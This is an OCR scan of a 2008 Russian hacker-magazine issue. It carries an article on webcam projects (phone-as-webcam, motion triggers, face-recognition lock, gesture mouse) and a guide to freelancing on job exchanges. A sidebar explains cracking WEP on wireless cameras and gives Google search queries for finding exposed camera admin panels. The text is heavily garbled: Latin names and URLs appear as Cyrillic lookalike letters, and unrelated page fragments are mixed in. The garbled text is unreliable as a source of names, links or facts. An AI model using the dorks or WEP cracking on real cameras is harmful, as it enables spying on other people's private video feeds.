программой на компьютер инсталлится специальный драйвер 
виртуальной камеры. Таким образом, полученное изображение 
можно использовать в 5куре, Ѵігіиаі йиЬ — да в какой угодно 
программе, и ни одна из них не будет даже догадываться отом, 
что изображение ей передается с телефона! В последней вер- 
сии ѴѴеЬСатега Ріив помимо картинки стала передавать еще и 
звук. Поэтому к «случайно» забытому у тебя дома смартфону я 
бы посоветовал отнестись со всей осторожностью :]. 

Даже если в мобильнике нетбеспроводного модуля, ничего 
не мешает сделать из него обычную камеру (подключив 
телефон к компу по 115В). По меньшей мере, это избавиттебя 
от необходимости покупать веб-камеру. И не спеши ругаться, 
если у тебя устройство на базе другой платформы. Специаль- 
но для владельцев смартфонов с ОС ЗутЬіап мы нашли еще 
один продукт, предоставляющий схожую функциональность. 
Неумея передавать данные по ѴѴі-Рі, МоЬіоІа ѴѴеЬсат ( ѵѵѵѵѵѵ. 
ѵѵагеіех.сот ) отлично работает по 115В и ВІиеІооіЬ, при этом 
существуют версии для ЗутЬіап 560 и 1110. То есть работать 
все будет и с большинством смартфонов Ыокіа, и новинками от 
5опу Егіссвоп. Владельцев обычныхтелефонов с поддержкой 
Заѵа также не обделили: для них есть специальная версия 
МоЬіоІа ѴѴеЬсат І_йе. Последняя, правда, умеет передавать 
данныетолько по ВІиеІооіЬ. 

^ 2. СИГНАЛИЗАЦИЯ СВОИМИ РУКАМИ 



Серверная часть ѴѴеЬСатега Ріив принимает изображение 



Вдоволь наигравшись с радиоуправляемой машинкой и 
прикрепленной кней камерой (чуть неубив иту, и другую), мы 
задумались о более практичном применении. Беспроводная 
камера в этом плане даетогромный простор для деятельности. 
Кактебе идея сделать видеоглазокдля квартиры или систему 
слежения за автомобилем, который ты оставляешь на ночь 
во дворе? Да запросто! Поможетнам в этом специальная 
программа ѴѴеЬсат 2опе Тгіддег ( \ллл/ѵѵ.20пе1:гіааег.сот ). Суть 
в том, что на любую часть изображения, передаваемого с 
веб-камеры (пусть это будет окружность с некоторым радиу- 
сом), можно создать та к называемый триггер. Скажем, если 
камера «смотрит» на автомобильную стоянку перед домом, то 
триггеры можно поставить на каждое автомобильное место. 
Далее — все прозаично. Кактолько в заданной зоне происхо- 
дит какая-то активность (чувствительность, продолжитель- 
ность движения и прочие параметры, само собой, задаются 
в настройках), сработает соответствующий триггер. Задача 
программы — выполнитьопределенноедля этого триггера 
действие. Скажем, включить на компьютере сирену или ото- 



Определив внутри окружностей движение, ѴѴеЬсат 2опе 
Тгіддег выполнит соответствующие действия 



бразить изображение с камеры в системном трейе. Отправить 
етаіІ/5М5-сообщение или выполнить какой-то НТТР-за- 
прос. В конце концов, просто запустить некоторый сценарий. 
Словом, запрограммировать можно все, что угодно. Добавлю, 
что в качестве источника изображения можно использовать 
йѴ-камеру, ТѴ-тюнер, некоторые цифровые фотоаппараты и 
ІР-камеры. 

г 3. «УЗНАЙ МЕНЯ», ИЛИ СИСТЕМА 
ИДЕНТИФИКАЦИИ ЛИЦА 

Абылобы здорово, если б компьютертебя узнавал! В прямом 
смысле слова. Посмотрел и понял, что к монитору подошел имен- 
но™, а не сотрудниксоседнего отдела, норовящий стащитьу 
тебя что-то ценное. В общем, это и было нашей следующей идеей 



УѴ5сгеепСатега 

( ѵѵѵѵ\ллиѵ5оШит.ги ) 

— яркий пример того, 
что веб-камеру можно 
применять на произ- 
водстве. Например, 
для подсчета батонов, 
сходящих с конвейе- 
ра :). 
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идентификация человека с помощью веб-камеры. Конечно, сканировать 
сетчатку глаза мы не собирались, но вот распознать лицо человека, можно 
было попробовать. Найти готовые реализации такой идеи было непросто. Зато 
результат превзошел все ожидания: найденная в итоге утилита І_етоп5сгееп 
( ѵѵѵѵщ.кеѵіегпоп.сот ) оказалась именнотем, что нужно, и ктомуже совершен- 
но бесплатной. 

Научить программу распознавать физиономию несложно. Это называется 
Епгоіітепі:. Слева в окне настроек отображается изображение с камеры, при- 
чем твое лицо, в каком бы положении ты ни находился, выделяется специаль- 
ным контуром. Можешь ради эксперимента подвигать головой — посмотри, 
что произойдете контуром. Справа от изображения находятся две шкалы. 
Первая (Расе сіеіесііоп сопббепсе) показывает качество распознавания. Как 
только оно будет выше заданного порогового значения (шкала окрасится в 
зеленый цвет), можно нажимать на кнопку Іірбаіе тосіеі — и таким образом 
сохранять образ в память программы. Вторая шкала показывает, насколько 
текущий образ в камере соответствует уже сохраненной модели. Для вер- 
ности в нижнем поле задается специальной пароль, с помощью которого ты 
сможешь разблокировать компьютер на случай, если что-то пойдет нета к. 
Через 60 секунд отсутствия какой-либо активности в камере, І_егпоп5сгееп 
блокирует систему. Интереса ради можешь попросить кого-нибудь из дру- 
зей подойти к компьютеру. Бьюсь об заклад, экран не разблокируется. Но 
стоит лишьтебе посмотреть в камеру — на мониторе отобразится рабочий 
стол! Увы, освещение можетсыграть противтебя, усложнив распознава- 
ние. Поэтому, если программа не признает«отца родного», посмотри в 
камеру и введи в нужном поле пароль. Компьютер разблокируется, а в па- 
мяти І_егпоп5сгееп будет обновлен образ. Это особенно актуально для тех, 
кто использует программу на ноутбуке. Короче говоря, утилита поистине 

► 032 



Н 4. УПРАВЛЯЙ МЫШКОЙ ДВИЖЕНИЯМИ ГЛАЗ! 

В наших новостях часто проскакиваютзаметки отом, что некиеученые 
научились считывать и интерпретировать сигналы мозга. В доказатель- 
ство приводятся видеоролики, где какая-нибудь миловидная девушка, 
безжалостно облепленная непонятными датчиками, неспешно передви- 
гает курсор мыши одной лишь силой мысли. Ну, просто подумала отом, 
что неплохо бы его переместить в правый верхний угол — и он чудесным 
образом там оказывается. Сразу говорю: подобного аппарата у нас нет (и 
то только потому, что не хватает времени его спаять по чертежам, которые 
набросали еще прошлой осенью). Но перемещать курсор, просто подвигав 
головой или даже посмотрев в нужное место, — это мы можем! Пока я искал 
хорошую реализацию системы распознавания лица, мне попалась по-на- 
стоящему волшебная программа с говорящим названием Сатега Моизе 
( ѵѵѵѵѵѵ.сатегатоизе.ога ] . 

Весь интерфейс утилиты — небольшое окошко, на котором выводится 
изображение с камеры. Но стоит щелкнуть на какую-нибудь часть лица 
(для этого в камеру, конечно же, нужно посмотреть), как к ней тут же 
«прилепится» зеленый квадратик. Теперь он будет повторять все дви- 
жения твоей головы. Нажми <ЫитІоск> и посмотри по сторонам: мышка 
будетдвигаться именно в ту сторону, в какую ты повернешь голову! 
Сложее выполнить клик мышью: для этого в настройках программ ука- 
зывается таймаут в секундах (замеряется отсутствие движения), после 
которого эмулируется нажатие мышки. Поверь: это надо попробовать 
самому! Мне попадались самые разные программы и, по правде говоря, 
удивить меня достаточно сложно. Но эта софтина произвела просто 
потрясающее впечатление! 

0 Б.АТЕПЕРЬ — УПРАВЛЯЕМ ПРОСТО РУКАМИ! 

Оченьскоро выяснилось, что для управления курсором мыши вовсе 
необязательно мотать головой (как бы эффектно это ни смотрелось). Набор 
специальныхжестов в связке с камерой, которая непрерывно отслеживает 
движения рук, позволяют весьма удобно перемещать курсор по экрану и 
выполнять все необходимые действия, не подходя к компьютеру. Несмотря 
на быстро обнаруженный ролик на ѴоиТиЬе.сот, наглядно демонстрирую- 
щий подобный метод, найти конкретную реализацию оказалось довольно 
сложно. Первую находку НапсіѴи ( ѵѵѵѵѵѵ.тоѵе5Іп5І:і1:и^е.огд/~коІ5сб/НапсіѴи/ 
НапсІѴи.ЬітІ ) при всем красочном описании на сайте разработчиков за- 
пустить мне так и не удалось. Пришлось помучаться с тем, чтобы установить 
нужную версию библиотеки ОрепСѴ, на которую завязана программа. Про- 
блема возникала из-за того, что последний релиз программы, вышедший 
еще в 2006 году, использовал древние версии библиотек, которые сейчас 
днем с огнем не сыщешь. Но даже послетого как мне удалось запустить 
НапсіѴи, она упорно игнорировала любые мои жесты. Пришлось искать 
альтернативу. НапсІ безіиге Іпіег^асе ( \лл/ѵѵѵ.стре.Ьоип.еби.Іг/~ке5кіпс ) 
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> іпіо 

Программы для визу- 
ального распознава- 
ния образов кажутся 
жутко сложными. На 
самом деле, почти все 
они основаны на бес- 
платной библиотеке 
ОрепСѴ [ зоигсеіогае. 
пе1/рго|ес1з/ 
орепсѵІіЬгагу ]. в ко- 
торой и реализованы 
большинство сложных 
математических алго- 
ритмов. А прикладные 
программисты лишь 
грамотно используют 
ее возможности. 









оказалась сговорчивее и запустилась сразу, но попроси- 
ла подключить вторую камеру. Позже выяснилось, что для 
работы подобных программ обязательно нужны две камеры: 
одна отслеживает перемещения руки по вертикали, другая 
— по горизонтали. Все это в реальном времени, поэтому 
управление получается максимально интуитивным. Принцип 
понятен: двигаешь рукой — двигается и курсор. По набору 
жестов совершаются разные действия: левый и правый клик, 
перемещение объектов. Лучше это просто попробовать, для 
чего потребуется вторая камера и яркая перчатка, надетая на 
твою руку. 



проецируется картинка. Короче говоря, стоя рядом со спрое- 
цированным изображением, ты можешь работать на компью- 
тере, перемещая курсор мыши с помощью карандаша с ярким 
наконечником или лазерной указки. Клик мыши, разумеется, 
также реализован и осуществляется в случае, если указатель 
некоторое время стоит на месте. Технология называется РоіпІ- 
апсі-сііск и оченьудобна. Единственный недостаток (а для 
кого-то — достоинство] Мапбо заключается в том, что работает 
он только под никсами и конкретно графической оболочкой 
КйЕ. Однако устанавливается без сучка и задоринки по стан- 
дартной схеме: 



^ 6. ВПЕЧАТЛЯЮЩИЙ ПРОЕКТОР 

Каждый, кто когда-то проводил презентацию на проекторе, 
знает, насколько сильно сбиваете мысли необходимость под- 
ходить к компьютеру, чтобы перелистнуть слайд или, того хуже, 
выполнить какое-то действие. За «пульт» можно посадить по- 
мощника, что отчасти решит проблему, нотолько втом случае, 
если сам человек втеме и понимаеттебя с полуслова. Нотебя 
могут каверзно попросить показать что-то очень специфиче- 
ское и тогда тебе все-таки придется подойти к компьютеру. 

Или не придется, еслиты заблаговременно разберешься с 
проектом Мапсіо [ 5оигсеІогде.пеі/рго_іесІ5/тапсІо 1. 

Состоящая из проектора и веб-камеры система, позволяет 
виртуально перемещать курсор мыши в соответствии с тем, 
что в этот момент показывает выступающий на полотне, куда 



баг хз б тапсіо-і . б . баг .Ът.2 
ссі тапсіо-і . 6 
. /сопбідиге 
таке 
. /тапсіо 

После запуска и автоматической калибровки можно присту- 
пать к работе. Надо отдать должное разработчикам: система 
работает на ура. Учти, впечатленная подобной фишкой аудито- 
рия наверняка удивленно спросит: «А какты это сделал?!» 

г 7. УСТРОЙ ТРАНСЛЯЦИЮ В СЕТЬ 

Если раньше длятрансляции изображения с камеры в Сеть 
приходилось плясать с бубном, чтобы подружить веб-демон 



Как взламывают 
ѴѴі-Рі камеры 

Раз уж мы заговорили о том, как создать свою беспро- 
водную камеру, то коснемся ее безопасности. Любое 
ѵѵігеіезз-устройство передает данные в разделяемый 
эфир, логично предположить, что их можно перехватить. 
Большинство камер из тех, что первыми появились на 
рынке, не имели шифрования в принципе, поэтому пе- 
рехватить передаваемую ими картинку ничего не стоит. 
Впрочем, поддержка ѴѴЕР-шифрования мало меняет 
картину. Поскольку «глазик» постоянно нагнетает трафик 
за счет своего вещания, можно очень быстро перехватить 
необходимое для взлома количество инициализационных 
векторов (IV) и расшифровать ключ. Камеры в боль- 



шинстве своем работают по четырем каналам передачи 
сигнала: 

сЬаппеІ А = 2,411 ГГц 
сЬаппеІ В = 2,434 ГГц 
сЬаппеІ С = 2,453 ГГц 
сЬаппеІ Б = 2,473 ГГц 

Не так давно на страницах нашего журнала освещалась 
прога ЬаибПог С пбеіепсе.ги/сопіет/ргобисі: пеѵге/ігаО . 
которая занимается поиском ѵѵеЪ-панелей администрато- 
ра различного сетевого оборудования, в том числе — то- 
чек доступа и камер, внутри сети. Заюзав ее, ты сможешь 
посмотреть изображение в окне своего браузера. Кстати 
говоря, очень многие админ-панели от веб-камеры про- 
индексированы самим Соо§1е’ом. Их очень легко найти, 
используя один из следующих запросов: «иг1:/ѵіе\ѵ/іпсІех. 
зЬйпІ» или «іпигі: Ѵіе\ѵегРгате?Мо(іе = ». 
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и специальные модули, то теперь все стало намного проще. Прикольная 
утилита ѵѵеЬсатХР [ ѵѵѵѵѵѵ.ѵѵеЬсатхр.сот ) позволяеттранспировать изо- 
бражения с веб-камеры в инетбез настройки какого-либо оборудования. 
Процесс конфигурации сводится кнескольким кликам мыши. Программа 
определитвсе необходимые настройки, а потом попробует подключиться 
сама ксебе, используя специальный сервер. Особенно выгодно ѵѵеЬсатХР 
выглядитза счетсвоей универсальности. Для удаленного подключения 
на клиентской стороне может использоваться все, чтоугодно: решение на 
базе Эаѵа, браузер с поддержкой Эаѵазсгірі: или ЕІазЬ. Последний уж точно 
есть практически на любой системе. При этом администратор может четко 
настроить систему безопасности, создав аккаунты с различными правами 
доступа. Я уже не говорю о простой защите с помощью пароля. 

Еще одна похожая утилита — Асйѵе ѴѴеЬСат [ѵѵѵѵѵѵ.рувой.сот ). Помимо 
трансляции в Сеть, онаумеетоцифровывать видео. Эта программа снимает 



сигнал сѵѵеЬ-камер, видеокамер или плат видео-захвата (втом числе, ТѴ 
тюнеров) с максимальной частотой 30 кадров в секунду. Захваченное видео 
можно сохранить как в родном формате программы, так и оцифровать 
с помощью любого кодека, установленного в системе. Если есть жела- 
ние, можно включить отсылку определенныхуведомлений при наличии 
засекаемых движений перед камерой. Это позволяет использовать Асбѵе 
ѴѴеЬСат в качестве реальной системы слежения. 

Если вдруг окажется, что ты находишься за файрволом, обе программы мо- 
гутоказаться бессильны. Впрочем, когда кровь из носа нужнотранслиро- 
вать сигнал из какой-то суперзащищенной сети, прячущейся за ЫАТ'ом и 
файрволами, то в этой ситуации банально выручитБкуре [ ѵѵѵѵѵѵ.зкѵре.сот ) 
с его продвинутым протоколом. Не забудь в настройках (Тооіб -> Орбопз 
Ѵібео) включить автоответ для заранее созданного аккаунта, который и 
будешь использовать для удаленного подключения ксвоей камере. 30 . 



Глаза для робота 

Если вдруг ты нацепишь беспроводную камеру на КС-машинку или, 
вообще, собственноручно созданного робота (из конструктора ЬЕСО, к 
примеру), есть смысл задуматься о создании машинного зрения. Опять 
же с помощью веб-камеры! Только представь, твой робот сам сможет 
перемещаться по помещению, производить распознавание объектов, 
анализировать ситуацию и выполнять определенные действия. Каза- 
лось бы, задача настолько специфична, что никаких готовых решений 
здесь быть не может. Однако ж нет: существует специальный набор 
программных средств для создания машинного зрения — КоЪоКеаІт 
Гѵѵ\ѵ\ѵ.гоЬогеа1т.сот) . Ничего не стоит, например, научить робота 
распознавать на полу шарик красного цвета и пинать его по полу. Про- 
изводители веб-камер, наверняка, не могли и подуматьть о подобном 
применении их продукции, а ребята с робофорума С ѵѵѵѵѵѵ.гоЪобогит.ги) 
и любительского сайта (гоЬогеаІт.пагоб.ги) уже переводят документа- 
цию по этой программе и приводят конкретные примеры. 
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ЗАМЕТКИ ВОЛЬНОГО СТРЕЛКА 



Неважно, кто ты и из какого города. Не имеет значения, сколько тебе лет 
и кто ты по национальности. Если ты умеешь делать что-то хорошо, — ты 
можешь стать фрилансером. Заниматься тем, что ты любишь и умеешь, без 
жесткого графика и тупого начальника. И при этом — зарабатывать вполне 
приличные деньги! 



отратив несколько недель на кликание по непонятным бан- 
нерам и участие в сомнительных партнерских программах, я 
понял: бесплатного сыра в жизни нет. Нетего и в интернете. 
Чтобы заработать деньги, надо пахать и неважно: на заводе, 
в офисе или в Сети. На тот моменту меня были довольно широкие знания 
в ІТ. Хотелось их развивать. Тогда я решил попробовать себя во фрилан- 
се. Когда-то называвшиеся «внештатными работниками», фрилансеры 
ныне востребованы как никогда. Многим работодателям просто невы- 
годно брать в штатузкопрофильного специалиста, чтобы тот выполнял 



разовую работу. Намного проще (и зачастую выгоднее) отдать ее на 
фриланс — найти вольного стрелка, который знает свое дело и выполнит 
задание за плату, как правило, меньшую, чем запросят в профессиональ- 
ном агентстве. Избавленный от необходимости создавать новое рабочее 
место, оформлять сотрудника по трудовому кодексу и заморачиваться с 
налоговыми органами, заказчик получает массу плюсов. Преимущества 
для фрилансера тоже очевидны: вместо того, чтобы сидеть в душном 
офисе, он работает, когда захочет и как захочет. И самое главное — тру- 
дится исключительно на себя, а значит, вся прибыльтоже его. Поскольку 
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],ля программиста РНР работа найдется всегда: ежедневно публикуется огромное количество зака- 
:ов. Если бы не индусы, готовые работать за 3 копейки, то вообще все было замечательно 




3 профайле каждого пользователя 
его рейтинг, а также отзывы 
видишь, фидбеки могутбыть 
тельные, так и резко негативные 




схема устраиваетобе стороны, то нет ничего удивительного, 
что фриланс стал так популярен. 

0 КОГДА ВО ФРИЛАНСЕРЫ? 

Работать «на дядю» или на себя — каждый должен решить 
сам, и, возможно, для этого придется попробовать оба вари- 
анта. Умеешь литы настраивать серверы, понимаешь что-то 
в дизайне или можешь написатьтысячи строк кода за день, 

— неважно. Было бы желание, ты и дня не проведешьбез 
дела. Хорошие фрилансеры нарасхват, и если на первых по- 
рах возможен некоторый дефицитзаказов, то через некоторое 
времяты непременно обзаведешься постоянными заказчика- 
ми, с которыми работать выгодно и удобно. 

Важно — не бояться. Попробовать свои силы можно, даже 
если ты новичок. В этом случае браться лучше за самые про- 
стые (и соответственно, самые низкооплачиваемые) задания, 
предварительно продумав решение. Таким образом, ты и без 
денег не останешься и незаметно для себя поднатореешь, 
заматереешь и сможешь браться уже за более серьезные 
проекты. В идеале — будешь сам нанимать работников, чтобы 
те выполняли часть кропотливой работы. Конечно, «не боять- 
ся» вовсе не означает«браться за все, авось получится». Это 
очень частая ошибка, которая зачастую приводит ктому, что 
вольный стрелок проваливается, переживая сам и серьезно 
подставляя заказчика, у которого, вполне вероятно, нет друго- 
го варианта и запаса времени. 

0 КАК НАЧАТЬ? 

Возникает логичный вопрос: а где взять-то эти самые зада- 
ния? Можно проспамить по базе е-таіі, написать рекламу в 
кабинке лифта, а можно запостить предложение в ЖЖ — ко- 
роче говоря, вариантов сколько угодно. Но чтобы фрилансеры 
не морочили себе голову, а работодатели могли найти их в 
любое время, были созданытакназываемые фриланс-биржи. 
Специальные сайты, где фрилансеры выкладывают резюме, 
а работодатели — публикуют задания и проводят что-то типа 
тендера. В русской части интернета наибольшую популяр- 
ность получили такие ресурсы, как (гее- Іа псе, ги и ѵѵеЫапсег. 
пеі (подробности во врезке). Но я с самого начала предпо- 
читал сотрудничать с западными ресурсами, типа ѵѵѵѵѵѵ. 
деіаігееіапсег.сот (далее — САР). Причин было несколько: 
заказовтам больше, оплата выше, а вероятность того, что мо- 
гут кинуть, значительно ниже. Вот и сегодня я тебе расскажу, 
как попробовать свои силы на западной арене, а конкретно, 
площадке ѵѵѵѵѵѵ.аеіаітееіапсег.согп (как наиболее известной). 
Набираем адрес биржи в браузере и, не пугаясь спартанского 
дизайна, кликаем по кнопке Бідп 11р. Процедура регистрации 
стандартна: указываем имя пользователя и е-таіі, на который 
будет выслан код подтверждения. Далее идут опциональные 
поля — по идее их можно проигнорировать, но если заполнить 
все правильно, указав сферу своей деятельности (скажем, 
ХМІ_, РНР, баѵаЗсгірІ:), получится неплохая визитная карточка. 
Забегая вперед, скажу, что в твоем профиле будут отображать- 
ся отзывы работодателя — «фидбеки». В регистрации есть 



единственныйтонкий момент: правила ресурса запрещают 
указывать в профиле какую-либо контактную информацию. В 
противном случае аккаунт быстро заблокируют. 

В РАБОТА С ЗАКАЗАМ И 

Все проекты (задания) на бирже рассортированы по мно- 
гочисленным категориям, например: С++, ХМІ_, Ріазб, 05. 
Работа здесь найдется для всех: программистов, дизайнеров, 
копирайтеров, системных администраторов и даже пен-тес- 
теров. Если человеку нужен фрилансер, он заходит на 6АР и 
создает проект в нужной категории. При этом указывает суть 
задания, объясняет, что надо сделать и задает несколько 
параметров проекта: статус (открытый, закрытый), а также 
возможный бюджет. Закрытые проекты нужны в том случае, 
когда заказчик заранее знает, с кем будет и меть дел о, и сам 
рассылаетприглашения проверенным фрилансерам. Однако 
в большинстве случаев проекты открыты для всех желающих. 
Ажелающих, как водится, много. Исполнитель определяется 
входе своеобразного тендера. У кого больше положительных 
отзывов, кто предложит лучшую денежку, кто доходчивее 
убедит заказчика в своей компетентности —тому и флаг в 
руки. Чтобы участвовать в тендере, необходимо подать заявку. 
Просто пройтись по сотне проектов, наставить кучу ставок — и 
ждать, пока одна из них победит, нельзя! Количество заявок 
ограничено. Чтобы увеличить квоту, необходимо приобрести 
специальный аккаунтЗоІб тетЬегзЫр. Абонентская плата 
составляет 12 долларов в месяц. Впрочем, эти деньги быстро 
окупятся. У обычного аккаунта с каждой сделки сервис будет 
взимать комиссию, у боісі тетЬегзЫр этого нет. Понятно, что 
если ты только зарегистрировался, совсем не хочется платить 
неизвестно за что. Поэтому боіб тетЬегзЫр можно купить по- 
сле первых выполненных в обычном статусе проектов, однако, 
я все же рекомендую сделать это сразу! 

Предположим, ты нашел проект, который можешь и хочешь 
выполнить, — самое время подать заявку на участие, то есть 
сделать ставку, указав желаемое денежное вознаграждение 
(не может превышать заявленный заказчиком бюджет, но 
можетбыть меньше). Если проект открытый, естьсмысл пос- 
мотреть уже сделанные ставки и запроситьденегчуть меньше, 




> ІП^О 

Фрилансеры со 
стажем зачастую со- 
бираются в группы, 
чтобы выполнять 
задания сообща и, 
тем самым, добиться 
большей эффек- 
тивности. Тягаться 
с ними сложно, но 
можно. Ктому же, 
никто не мешает 
тебе найти помощ- 
ников и сколотить 
команду самому. 

Вместо ѵѵѵѵѵѵ. 
ае(а(гееІапсег.сот 
с его устаревшим 
интерфейсом и 
набором сервисов 
многие рекомендуют 
геЫасосІег.сот . На 
рентакодере нет 
ограничений на 
количество бидов 
и платы за аккаунт, 
зато администрация 
взимает большой 
процент от сто и м о сти 
работы. Рекомендуют 
та кже еіапсе.сот . 



Примеры заказов 

Чтобы окончательно внести ясность, приведу несколько примеров заданий, кото- 
рые я взял прямо с первой страницы сайта: 

• настроить почтовый сервер на базе Ребога 6 с использованием Розібіх, Соигіег, 
Му^І, РозГЙх, Ребога 6 (100$); 

• создать простой сайт с одной флеш-вставкой (300$) ; 

• стенография 4-х часового интервью (100$); 

• переписать 2000 строк кода с Регі на баѵа (2000$) ; 

• улучшение аудио-кодека (4500$). 



ХАКЕР 05 /113/ 08 



► 037 




рс_гопе 




Дебетная карта отбеіАРгееІапсег 
- верный способ получить зарабо- 
ганные денежки 
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Все проекты тщательно рассортированы по категориям. Как видишь, работенка найдется для каждого, независимо 
оттого, умеетон рисовать или программировать 



чем все остальные (это не значит, что нужно жестко демпинговать). Напоми- 
наю, что количество ставок (даже в случае боШ тетЬегзЫр) ограничено, 
поэтому заявку нужно подавать только втех проектах, где есть реальный 
шанс выиграть. Если заявки подали уже десять разных фрилансеров, утрех 
из них куча положительных фидбеков и срок выполнения у них втри раза 
меньше, чем ты собирался предложить, то участвовать, очевидно, смысла 
нет. 

Представь, в заявке нужно что-то написать! Опытные фрилансеры 
предпочитают не раскрывать козыри, поэтому пишут что-то вроде 
«Ріеазе сЬеск РМ» (пожалуйста, посмотрите личные сообщения), а 
все подробности отправляют по внутренней почте ОАР’а. Главная твоя 
задача — убедить заказчика, что именно ты сможешь выполнить заказ 
лучше всех. Для этого в письме можно дать ссылку на свое портфо- 
лио с похожими проектами, рассказать, какты собираешься решить 
поставленную задачу. Воттебе конкретный пример. Выполняя заказы 
средней сложности на С++, я заранее стал писать простые прототипы 
будущих приложений и отправлял их заказчику. Результат не заставил 
себя ждать: 90% тендеров оставались за мной, притом, что я указывал 
максимально возможную цену. Готовый прототип — хорошая гарантия, 



Русскоязычные 

биржи 

• ѵгеЫапсег.пеІ: . Одна из самых старых бирж, появившаяся 
еще в 2003 году. Продуманная система привлекает огромное 
количество работодателей и фрилансеров. Денежные тран- 
закции можно защитить с помощью гарант-системы. Среди 
прочего, бабло можно зарабатывать благодаря партнерской 
программе. 

• ѵ\п/\гѵѵ.]Ргее-1апсег5.пеГ . Удобный сервис, предоставляю- 
щий механизм безопасной сделки (комиссия 1%), а также 
— генератор технических заданий и возможность рекламы в 
каталоге фрилансеров (в резюме будет ссылка на твой порт- 
фолио-сайт) . 

• бгееіапсе.ш . Переделанный из обычного форума движок 

— явно не самая сильная черта сайта. Вместо дополнительных 
возможностей мы получаем лишь продвинутый форум, на 
котором публикуется большое количество заказов. Зато поль- 
зователям предоставляется бесплатный хостинг с поддержкой 
РНР,Му50>ЬиРег1. 

• бгее-іапсе.ги . Самый молодой проект, но при этом самый 
раскрученный: наибольшее количество предложений в рунете 
публикуется именно здесь. Полный набор сервисов: гарант-сис- 
тема, возможность поставить свой баннер, магазин для продажи 
работ, рейтинговая система и ранком «Рго». 



что работа будет выполнена в срок, а это чуть ли не самое важное для 
заказчика. 

Если заказчик выбереттебя в качестве исполнителя, то придет письмо 
«Ргоіесі: ВісІ ѴѴоп», а статус проекта поменяется на «Ргогеп». По ссылке в 
письме нужно подтвердить свое участие — и проекту будет дан старт. Теперь 
придет письмецо от ѵѵѵѵѵѵ.аеіаЫееІапсег.сот — «Рго|ес1 Ьедіпэ», в котором 
указан е-таіі заказчика. Статус на странице проекта меняется на «СІозесІ». 
Еслиутебя нетаккаунта боісі тетЬегзЫр, то со счета спишется комиссия 
сервиса (10%, но не меньше $5). Ничего страшного, если счетуйдет в 
«минус». Баланс может оставаться отрицательным до месяца. Внимание, 
важный момент! Чтобы застраховать себя от«кидалова», можно попросить 
заказчика перечислить деньги на езсгоѵѵ-счет (подробности во врезке). 
Далее все зависит оттебя. Если выполнишь все правильно и в срок, заказ- 
чикзакроет проект, и деньги перечислятся тебе на счет. Если не справишь- 
ся — оплаты можно не ждать, зато работодатель наверняка впаяеттебе 
негативный отзыв в профайл. С таким клеймом найти проекты будетзначи- 
тельно сложнее. С другой стороны, грамотно выполнив заказ, ты можешь 
смело просить работодателя написать о твоих заслугах. Большое количест- 
во положительных фидбеков — твой главный козырь в ходе тендера. 



Опыт матерого 
фрилансера — 
Криса Касперски 

«Меня иногда спрашивают: сколько может получать фрилансер? 
Общаясь с моими знакомыми, я пришел к выводу, что в среднем 
фрилансер получает от $1к до $3к, но это очень-очень условные 
цифры. Можно выйти и на уровень $ 10к в месяц — смотря как 
работать. В то же время кто-то застрял на планке в $ 100 и лишь 
изредка получает $500. Опытный фрилансер получает столько, 
сколько хочет: заказов полно — только успевай. Где искать заказы? 
Что касается хакерства (секьюрити там, безопасность) , то лучше 
искать заказы на серьезных забугорных сайтах типа ОрепКСЕ. 
ог 2 , на которых присутствуют сотрудники крупных компаний. 
Читая чужие блоги и оставляя там свои комменты, можно выйти 
на нужных людей: к примеру, многие мои знакомые устроились 
работать в МісгозоЛ: как фрилансерами, так и на полную ставку. 
Вообще, главное правило фрилансера — лучше не искать заказов, 
а ждать их поступления, предварительно как-то зарекомендовав 
себя. Например, путем публикации статей на серьезных сайтах или 
участия в известных опен-соурсных проектах. Основная проблема 
в том, что большинство компаний предпочитают работников на 
полный рабочий день и крайне неохотно идут на фриланс. Зачас- 
тую он совершается неофициально и оплачивается из кармана 
руководителей различных подразделений фирмы, которым срочно 
нужна рабочая сила, ан нету. . . » 
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На проекте ОеіАСосІег.сот публикуются проекты только для программистов, но зато их очень много! 



Н ВЫВОДДЕНЕГСОСЧЕТА 

Итак, дела пошли, ты уже выполнил несколько проектов и хочешь вывести 
деньги с внутреннего счета на ОАР’е. Это можно сделать нескольки- 
ми способами: с помощью платежной системы РауРаІ, переводами 
МопеуЬоокегз, на специальную дебетовую карту, посредством Е-6оШ 
или банковского перевода. Ксожалению, РауРаІ по-прежнему запрещает 
жителям России и всему СНГ приниматьденьги на свой счет, поэтому этот 
вариант отпадает. Придется выбирать из оставшихся. Проще всего, конеч- 
но, выводить через Е-ОоШ сустановленной комиссией в 5%. Минимальная 
сумма вывода на Е-ОоШ составляет$30, максимальная — $250 в неделю. 
Единственная загвоздка в том, что в первый раз вывод денег будет осуще- 
ствлен через 45 дней (антифрод система). После того, как администрация 
убедится, что ты не кардер, выводящий деньги через их сервис, транзакции 
будут осуществляться очень быстро. Напомню, что Е-боШ просто обнали- 
чить в специальных обменниках или поменять на ѴѴеЬтопеу. 



Что такое езсгоѵѵ- 
счет? 

Сразу после начала работы на САР’е фрилансер может обезопа- 
сить себя от кидал ова и попросить заказчика перевести деньги 
на так называемый езсгоѵѵ-счет, который курирует админист- 
рация сервиса. Исполнитель не может забрать их оттуда, пока 
заказчик не подтвердит, что проект выполнен (езсгоѵѵ геіеазе) . 
Забрать назад деньги с езсгоѵѵ-счета заказчик может только 
после отмены оплаты исполнителем (если проект не может быть 
выполнен) . Спорные случаи рассматриваются администрацией 
ѵ\длгѵѵ.^еГабгее1апсег.сот . То есть езсгоѵѵ — это гарантия получения 
оплаты фрилансером. 



Для удобства я рекомендую заказать дебетовую карту, которая высылается 
почтой и идет около четырех недель. С ней ты сможешь снимать деньги в 
любом банкомате или использовать ее для оплаты в магазине. Комиссия 
при больших суммах будетзначительно меньше чем, через Е-боШ. Деньги 
выводятся с 6АРа в ночь на понедельник (по нашему времени — где-то в 
понедельникднем). Правда, естьнюанс, установленный правилами ОАР’а: 
в первый раз деньги нужно ждать около трех недель. 

0 ФРИЛАНСИТЬ ИЛИ НЕТ 

Решать тебе. Я знаю очень многих людей, которые совмещают фри- 
ланс и обычную работу. Есть и те, кто работает на себя постоянно. Эти 
люди не ездят на РогзсЬе Сауеппе, но могут позволить себе вполне 
приличную иномарку. Они не колесят мир в поисках развлечений, но 
упорно трудятся, зарабатывая деньги. Повторюсь, бесплатного сыра 
не бывает. НЕ 
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Безопасность 

САМЫЕ СОВРЕМЕННЫЕ СПОСОБЫ ЗАЩИТЫ 



А51І5 Т гепсі СІиЬ - это клуб для тех, кто всегда хочет быть в курсе актуальных 
тенденций мира современных технологий. Наши эксперты выбрали 5 основных 
направлений, в которых будет вести работу Тгепб СІиЬ: развлечения, новинки, 
